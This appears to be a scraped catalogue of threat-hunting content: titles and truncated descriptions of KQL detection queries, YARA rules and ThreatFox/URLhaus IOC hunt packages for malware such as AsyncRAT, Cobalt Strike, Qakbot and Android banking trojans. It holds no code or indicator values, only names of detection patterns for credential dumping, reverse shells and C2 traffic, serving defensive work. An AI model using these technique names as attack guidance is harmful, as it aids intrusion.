ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
AsyncRAT is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent access to compromised systems. It typically arrives via phishing emails, malicious downloads, or exploit kits leveraging IP:port connections to establish command-and-control communication. SOC analysts should monitor for unusual outbound traffic on listed ports, signs of lateral
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Cobalt Strike
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Remcos
T1566
EmailEvents
This query visualises total emails with Spoof-DMARC fails detections summarizing the data by the top email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).
T1566
EmailEvents
This query visualises total emails with Phish-Spoof-external domain detections summarizing the data by the top 10 email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).
T1566
EmailEvents
This query visualises total emails with Phish-Spoof-internal domain detections summarizing the data by the top 10 email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).
Ruleset to detect android pornclicker trojan, connects to a remote host and obtains javascript and a list from urls generated, leading to porn in the end.
URL Detection
kql medium
DeviceNetworkEvents
This query finds network communication to specific URL. Please note that in line #7 it filters RemoteUrl using has operator, which looks for a "whole term" and runs faster. Example: RemoteUrl has "mic
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 46 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 54 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as ua-wget
VulnComputers
kql medium
IdentityQueryEvents
Detect Active Directory LDAP queries that try to find operating systems that are vulnerable to specific vulnerabilities This LDAP query cover MetaSploit - enum_ad_computers tool
The 'with_attachment' YARA rule detects files containing attachments, which may indicate malicious payloads or phishing attempts. SOC teams should deploy this rule in email gateways, endpoint EDR scanning, and file share monitoring to identify suspicious attachments in network traffic and stored files.
The 'with_images' YARA rule detects the presence of one or more image files within a payload, potentially
Rule to detect the presence of an or several urls
Rule to detect the no presence of any attachment
Rule to detect the no presence of any image
Rule to detect the no presence of any url
xbot007
yara low
YARA rule: xbot007
ADFSDomainTrustMods[Nobelium]
kql medium
CloudAppEvents
This query will find when federation trust settings are changed for a domain or when the domain is changed from managed to federated authentication. Results will relate to when a new Active Directory
Adware
yara low
Adware
alt-data-streams
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
Yara for variants of Trojan-Banker.AndroidOS.Tordow. Test rule
Yara detection for MazarBOT
yara low
The YARA rule 'android_mazarBot_z' detects Android malware associated with the MazarBOT family, which is known for credential theft and lateral movement. SOC teams should deploy this
This rule detects apps made with metasploit framework
android meterpreter
yara low
YARA rule: android_meterpreter
This rule try to detects OmniRat
yara low
This rule try to detects OmniRat
This rule detects the banker trojan with overlaying functionality
Yara detection for Android Locker app named Pink Club
The YARA rule Android_RuM
This rule try to detects Android.Banking.RuMMS
This
This rule detects Android wifi Switcher variants
android tempting cedar spyware
yara low
YARA rule: android_tempting_cedar_spyware
This rule try to detects Android.Triada.Malware
Anomalous Device Models
kql medium
This query finds anomalous models discovered
Virus de la Policia - android
yara low
Virus de la Policia - android
BankBot/Mazain attacking polish banks
Can Be Onboarded Devices
kql medium
This query surfaces devices that were discovered by Microsoft Defender for Endpoint and can be onboarded
chinese porn
yara low
YARA rule: chinese_porn
chinese2
yara low
YARA rule: chinese2
chineseporn4
yara low
YARA rule: chineseporn4
chineseporn5
yara low
YARA rule: chineseporn5
clear-system-logs
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
Commonality of Operating Systems
kql medium
This query provides the commonality of operating systems seen in the inventory
This query presents statistics on count and percentage of DeviceType out of total inventory
deleting-data-w-cipher-tool
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
detect-jscript-file-creation
kql medium
DeviceFileEvents
Adversaries may use obfuscated .jse files to deploy
This query finds devices by DeviceType and/or DeviceSubtype
Devices In Subnet - IPAddressV4
kql medium
This query surfaces devices that are in a specific IPAddressV4 subnet
Devices In Subnet - IPAddressV6
kql medium
This query surfaces devices that are in a specific IPAddressV6 subnet
DeviceNetworkEventsDeviceProcessEvents
To evade security software and analyst tools, Nobelium malware enumerates the target system looking for certain running processes, loaded drivers, and registry keys, with the goal of disabling them. T
Doc attachment with link to download
kql medium
DeviceEventsDeviceFileEvents
This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser download. This query is not noisy, but most of its results are clean. It can also hs
doppelpaymer-stop-services
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu
dowgin
yara low
YARA rule: dowgin
Dropbox downloads linked from other site
kql medium
DeviceFileEvents
This query looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site. File sharing sites such as Dropbox are often used for hosting malware on a reputable
Email link + download + SmartScreen warning
kql medium
DeviceEventsDeviceFileEvents
Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ignored by the user. Read more about these events and this hunting approach in this p
Find Software By Name and Version
kql medium
TExploitation for Client Execution
This query finds a software by name and/or version
genericSMS
yara low
YARA rule: genericSMS
genericSMS2
yara low
YARA rule: genericSMS2
Gootkit-malware
kql medium
AlertEvidenceDeviceNetworkEvents
This query was originally published on Twitter, by @MsftSecIntel. Gootkit is malware that started life as a banking trojan, and has since extended its capabilities to allow for a variety of malicious
hiding-java-class-file
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, Adwind utilizes Java for cross-platform impact. Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capa
Leadbolt
yara low
Leadbolt
This query was originally published in the threat analytics report, CVE-2020-0601 certificate validation vulnerability. The Windows CryptoAPI Spoofing Vulnerability, CVE-2020-0601, can be exploited to
MailPermissionsAddedToApplication[Nobelium]
kql medium
CloudAppEvents
This query will find applications that have been granted Mail.Read or Mail.ReadWrite permissions in which the corresponding user recently consented to. It can help identify applications that have been
The YARA rule 'marcher_v2' detects a new variant of the Marcher malware family, likely used for
marcher2
yara low
YARA rule: marcher2
marcher3
yara low
YARA rule: marcher3
Metasploit Payload
yara low
YARA rule: Metasploit_Payload
Most Common Services
kql medium
This query provides the most common services discovered
NotOnboarded Devices by DeviceName Prefix
kql medium
This query searches for not onboarded devices with a specific prefix
Open email link
kql medium
AlertEvidenceDeviceEvents
Query for links opened from mail apps - if a detection occurred right afterwards. As there are many links opened from mails, to have a successful hunt we should have some filter or join with some othe
Pivot from detections to related downloads
kql medium
DeviceEventsDeviceFileEvents
Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites. To learn more about the download URL info that is available and see other sample queries,. Ch
DeviceProcessEvents
Identifies potential service tampering related to Microsoft Defender services. Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Multipl
powercat-download
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
qakbot-campaign-process-injection
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware Qakbot is malware that steals login credentials from banking and financial services. It has
qakbot-campaign-self-deletion
kql medium
DeviceProcessEvents
The hypothesis detects Qakbot malware attempting to self-delete to evade detection, a
regsvr32-rundll32-abnormal-image-loads
kql medium
T1218.010T1218.011
DeviceFileEventsDeviceImageLoadEvents
This query is using the locations where malicious DLL images are often loaded from by regsvr32.dll and rundll32.exe. Blog: https://threathunt.blog/dll-image-loads-from-suspicious-locations-by-regsvr32
T1218.010T1218.011
DeviceImageLoadEventsDeviceNetworkEvents
This query is looking for regsvr32.exe or rundll32.exe loading DLL images with other extensions than .dll. Joins the data to public network events. References: https://threathunt.blog/running-live-mal
T1218.010T1218.011
DeviceNetworkEventsDeviceProcessEvents
This query looks for rundll32.exe or regsvr32.exe being spawned by abnormal processes: wscript.exe, powershell.exe, cmd.exe, pwsh.exe, cscript.exe. Blog: https://threathunt.blog/running-live-malware-f
This rule detects SandroRat
yara low
This rule detects SandroRat
sensual woman
yara low
YARA rule: sensual_woman
shimcache-flushed
kql medium
T1112
DeviceProcessEvents
This query searches for attempts to flush Shimcache, which may indicate anti-forensic or defense evasion activity by an attacker. Author: Vaasudev_Kala Ref: https://blueteamops.medium.com/shimcache-fl
The 'SlemBunk' YARA
This rule detects a kind of SMSFraud trojan
smsfraud2
yara low
YARA rule: smsfraud2
The 'spyAgent'
Ruleset to detect SpyNetV2 samples.
yara low
Ruleset to detect SpyNetV2 samples.
Yara rule for detection of different Spynote Variants
suspicious-base64-encoded-registry-keys
kql medium
T1112
DeviceRegistryEvents
Looks for suspicious base64 encoded registry keys being created. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/
T1112
DeviceRegistryEvents
Looks for suspicious addition of command interpreters to windows registry. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/
suspicious-keywords-in-registry
kql medium
T1112
DeviceRegistryEvents
Looks for suspicious keyword additions to windows registry. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/
This rule detects tachi apps (not all malware)
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Kimwolf
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Evilginx
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 59 IOCs associated with ClearFake
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 52 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 11 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Meterpreter
ThreatFox: PlugX IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with PlugX
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 32 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Remus
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information via remote access, often leveraging stolen credentials for lateral movement. It typically arrives through phishing emails containing malicious URLs or via compromised domains used for command-and-control communication. SOC analysts should monitor for unusual outbound traffic to listed domains
Detection of dendroid trojan
yara low
Detection of dendroid trojan
Trojan Droidjack
yara low
YARA rule: Trojan_Droidjack
UpdateStsRefreshToken[Solorigate]
kql medium
CloudAppEvents
This will show Active Directory Security Token Service (STS) refresh token modifications by Service Principals and Applications other than DirectorySync. Refresh tokens are used to validate identifica
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 21 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as arm
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 31 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as exe
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 31 malicious URLs tagged as malware_download
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
Rule to detect Viking Order Botnet.
yara low
Rule to detect Viking Order Botnet.
wadhrama-credential-dump
kql medium
DeviceRegistryEvents
This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul
wdigest-caching
kql medium
DeviceProcessEventsDeviceRegistryEvents
This query was originally published in the threat analytics report, WDigest credential harvesting. WDigest is a legacy authentication protocol dating from Windows XP. While still used on some corporat
IdentityDirectoryEvents
This query shows all modifications to highly sensitive active directory groups (also known as Tier 0). An example of these groups include Domain Admins, Schema Admins and Enterprise Admins. More info
BadMirror is Android malware. The malware sends information to its remote CnC (phone number, MAC adddress, list of installed applications...) but it also has the capability to execute a few commands s
This rule try to detects Clicker.G samples
The Android_Copy9 Y
DeathRing is a Chinese Trojan that is pre-installed on a number of smartphones most popular in Asian and African countries. Detection volumes are moderate, though we consider this a concerning threat
This rule try to detect Dendroid
yara low
This rule try to detect Dendroid
This rule try to detects Dogspectus
yara low
This rule try to detects Dogspectus
Yara rule for Dogspectus intial ransomware apk
This rule try to detects Android FakeBank_Fanta
This rule will be able to tag all the samples with local exploits.
CloudAppEvents
This query looks for users accessing multiple other users' mailboxes, or accessing multiple folders in another user's mailbox. This query is inspired by an Azure Sentinel detection. Reference - https:
This YARA rule identifies malicious files containing backdoor or dropper functionality used to deploy additional malware. SOC teams should deploy it in endpoint EDR scanning, email gateways, and file share monitoring
Banker Acecard
yara low
YARA rule: Banker_Acecard
http://research.zscaler.com/2015/07/fake-batterybotpro-clickfraud-adfruad.html
c2-bluekeep
kql medium
DeviceNetworkEvents
This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i
C2-NamedPipe
kql medium
DeviceEvents
Detects the creation of a named pipe used by known APT malware. Reference - https://docs.microsoft.com/openspecs/windows_protocols/ms-wpo/4de75e21-36fd-440a-859b-75accc74487c
DeviceNetworkEvents
This query was originally published in the threat analytics report, ShadowHammer supply chain attack Operation ShadowHammer was an attack against ASUS computer hardware, using the company's own update
cobalt-strike
kql medium
AlertEvidenceDeviceLogonEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
Connection to Rare DNS Hosts
kql medium
DeviceNetworkEvents
This query will break down hostnames into their second and third level domain parts and analyze the volume of connections made to the destination to look for low count entries. Note that this query is
Dendroid evidences via Droidian service
Dendroid RAT
yara low
Dendroid RAT
Dendroid evidences via ServiceReceiver
Device network events w low count FQDN
kql medium
DeviceNetworkEvents
Device Network Events Involving Low Count FQDNs. This query reduces network events to only those with the RemoteURL column populated,. Then parses the DNS name from the URL (if needed) and finds the l
DNSPattern [Nobelium]
kql medium
DeviceEventsDeviceNetworkEventsIdentityQueryEvents
This query looks for the DGA pattern of the domain associated with the Nobelium campaign, in order to find other domains with the same activity pattern. This query is inspired by an Azure Sentinel det
doppelpaymer-procdump
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu
EncodedDomainURL [Nobelium]
kql medium
DeviceEventsDeviceNetworkEventsDnsEventsIdentityQueryEvents
Looks for a logon domain in the Microsoft Entra ID logs, encoded with the same DGA encoding used in the Nobelium campaign. See Important steps for customers to protect themselves from recent nation-s
Entra ID group adds in the last 7 days
kql medium
T1548
CloudAppEvents
This query looks for Entra ID group adds identified by Microsoft Defender for Cloud Apps. It will require an corresponding app connector in Microsoft Defender for Cloud Apps.
Entra ID role adds in the last 7 days
kql medium
T1548
CloudAppEvents
This query looks for Entra ID role adds identified by Microsoft Defender for Cloud Apps. It will require an corresponding app connector in Microsoft Defender for Cloud Apps.
Detects fake facebook applications
yara low
Detects fake facebook applications
fake facebook
yara low
YARA rule: fake_facebook
fake instagram
yara low
The 'fake_instagram
fake king games
yara low
YARA rule: fake_king_games
fake market
yara low
YARA rule: fake_market
fake minecraft
yara low
YARA rule: fake_minecraft
fake whatsapp
yara low
YARA rule: fake_whatsapp
File download events in the last 7 days
kql medium
CloudAppEvents
This query looks for file download events identified by Microsoft Defender for Cloud Apps. It will require an corresponding app connector in Microsoft Defender for Cloud Apps. Reference - https://lear
Detect Gamma/FinFisher FinSpy for Android #GovWare
This rule automatically adds certificates present in malware
DeviceProcessEvents
This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by att
ibanking
yara low
YARA rule: ibanking
AlertEvidenceDeviceLogonEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. It finds all user accounts that have logged on to an endpoint affected by
Kerberos AS authentications
kql medium
IdentityLogonEvents
This query shows attempts to request Kerberos service ticket using the AS service, to monitor Kerberos AS authentications.
Koler.A builds
yara low
Koler.A builds
Koler.A class
yara low
Koler.A class
Koler.D class
yara low
Koler.D class
Old Koler.A domains examples
yara low
Old Koler.A domains examples
Detects samples repackaged by backdoor-apk shell script
lazagne
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread
libyan scorpions
yara low
YARA rule: libyan_scorpions
logon-attempts-after-malicious-email
kql medium
EmailEventsIdentityLogonEvents
This query finds the 10 latest logons performed by email recipients within 30 minutes after they received known malicious emails. You can use this query to check whether the accounts of the email reci
lsass-credential-dumping
kql medium
T1003.001
DeviceEventsDeviceFileEvents
This query looks for signs of credential dumping based on process activity instead of targeting process names. Author: Jouni Mikkola More info: https://threathunt.blog/lsass-credential-dumping/
MailItemsAccessedTimeSeries[Solarigate]
kql medium
CloudAppEvents
Identifies anomalous increases in Exchange mail items accessed operations. The query leverages KQL built-in anomaly detection algorithms to find large deviations from baseline patterns. Sudden increas
This rule detects is to detect a type of banking malware
Mass Downloads in the last 7 days
kql medium
T1020
CloudAppEvents
This query looks for mass downloads identified by Microsoft Defender for Cloud Apps. It will require an corresponding app connector in Microsoft Defender for Cloud Apps.
oceanlotus-apt32-files
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in a threat analytics report about the group known to other security researchers as APT32 or OceanLotus This tracked activity group uses a wide array of malicious d
oceanlotus-apt32-network
kql medium
DeviceNetworkEvents
This query was originally published in a threat analytics report about the group known to other security researchers as APT32 or OceanLotus This tracked activity group uses a wide array of malicious d
possible-affected-software-orion[Nobelium]
kql medium
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
Private Key Files
kql medium
DeviceFileEvents
Private Key Files. This query identifies file operation with files having. One of the extensions commonly used to save a private. Key. The risk is that if an attacker were to obtain. The file, they c
procdump-lsass-credentials
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
python-use-by-ransomware-macos
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is
Ransomware
yara low
Ransomware
Ransomware Test 2
yara low
Ransomware Test 2
recon-with-rundll
kql medium
DeviceNetworkEvents
This query was originally published in the threat analytics report, Trickbot: Pervasive & underestimated. Trickbot is a very prevalent piece of malware with an array of malicious capabilities. Origina
RedMenshen-BPFDoor-backdoor
kql medium
T1095T1059.004T1070
DeviceProcessEvents
This query was originally published by PWC Security Research Team. BPFDoor is custom backdoor malware used by Red Menshen. The BPFDoor allows an adversary to backdoor a system and remotely execute cod
reverse-shell-ransomware-macos
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is
robbinhood-driver
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. Robbinhood is ransomware that has been invo
robbinhood-evasion
kql medium
DeviceProcessEvents
The hypothesis detects Robbin
sandrorat
yara low
YARA rule: sandrorat
T1098.001
AuditLogs
Hunting query that looks for credential additions or updates on service principals and applications performed by actors (users or apps) that have not been observed initiating the same operations in th
snip3-aviation-targeting-emails
kql medium
EmailEventsEmailUrlInfo
Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks
snip3-detectsanboxie-function-call
kql medium
DeviceEvents
Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks
snip3-encoded-powershell-structure
kql medium
DeviceFileEvents
Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks
snip3-malicious-network-connectivity
kql medium
DeviceNetworkEvents
Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks
snip3-revengerat-c2-exfiltration
kql medium
DeviceNetworkEvents
Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques. The following query looks
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
ClearFake malware is a data exfiltration tool that establishes
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
KongTuke malware is a downloader that establishes command-and-control (C2) communication via the associated domains to exfiltrate data and deploy additional payloads. It typically arrives through phishing emails containing malicious
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 10 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 25 IOCs associated with Unknown malware
ThreatFox: Unknown Webinject IOCs
ioc-hunt high
DnsEvents
The "Unknown Webinject" malware
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Cobalt Strike
ThreatFox: Loki Password Stealer (PWS) IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
The Loki Password Stealer (PWS) is a credential-stealing malware that exfiltrates sensitive data such as passwords and browser credentials to command-and-control servers. It typically arrives via phishing emails containing malicious
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
Lumma Stealer is a data-exfiltration malware that steals sensitive information such as credentials, cookies, and browser data by leveraging compromised systems. It typically arrives via phishing emails or
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: SnappyClient IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with SnappyClient
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
ValleyRAT is a remote access trojan designed for data exfiltration and command-and-control (C2) communication, leveraging encrypted channels to maintain persistence and execute arbitrary payloads. It typically arrives via phishing emails with malicious attachments or exploit kits
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised systems to exfiltrate data to command-and-control servers. It typically arrives via phishing emails containing malicious attachments or links to malicious domains and URLs. SOC analysts should monitor for unusual outbound network traffic, unexpected process executions, and signs of credential theft or lateral movement beyond the listed IOCs.
tinhvan
yara low
YARA rule: tinhvan
Tor
kql medium
DeviceNetworkEvents
This query looks for Tor client, or for a common Tor plugin called Meek. We query for active Tor connections, but could have alternatively looked for active Tor runs (ProcessCreateEvents) or Tor downl
From static analysis
yara low
From static analysis
Search probably apks relationships
yara low
Search probably apks relationships
From cromosome.py
yara low
From cromosome.py
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 27 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 62 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor
Yara rule for detection of Fake AliPay Sms Stealer
This rule try to detects Spy.Banker AVITO-MMS Variant
This rule try to detects Spy.Banker AVITO-MMS Variant
androrat
yara low
YARA rule: androrat
apt sofacy
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml. Questions via Twitter: @janvonkirchheim.
apt sofacy zebrocy
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml. Questions via Twitter: @janvonkirchheim.
apt ta17 293a ps
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml. Questions via Twitter: @janvonkirchheim.
apt tropictrooper
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml. Questions via Twitter: @janvonkirchheim.
apt unidentified nov 18 (1)
kql medium
DeviceFileEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml. Questions via Twitter: @janvonkirchheim.
apt unidentified nov 18
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml. Questions via Twitter: @janvonkirchheim.
This rule detects apks fom ASSD developer
c2-lookup-from-nonbrowser[Nobelium]
kql medium
DeviceEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
c2-lookup-from-nonbrowser[Nobelium] (1)
kql medium
IdentityQueryEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
c2-lookup-response[Nobelium] (1)
kql medium
IdentityQueryEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
c2-lookup-response[Nobelium]
kql medium
DeviceEvents
This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2
cobalt-strike-invoked-w-wmi
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread
compromised-certificate[Nobelium]
kql medium
DeviceFileEvents
Search for the files that are using a compromised certificate associated with the Nobelium campaign. You can remove the comments to: 1. get the list of devices where there is at least one file signed
compromised NVIDIA certificates[Lapsus$]
kql medium
DeviceFileEvents
Search for the files that are using a compromised certificate associated with the Lapsus$ group. You can remove the comments to: 1. get the list of devices where there is at least one file signed with
confluence-weblogic-targeted
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Confluence and WebLogic abuse. 2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle We
coudw
yara low
The YARA rule 'coudw' detects artifacts associated with the malware family 'coudw', likely targeting endpoints or networked systems. SOC teams should deploy this rule in endpoint EDR scanning, email gateway
Detects CVE-2018-4878
yara low
Detects CVE-2018-4878
CVE-2012-0158 variant
yara low
CVE-2012-0158 variant
Java Applet JMX Remote Code Execution
cypherpunk-exclusive-commands
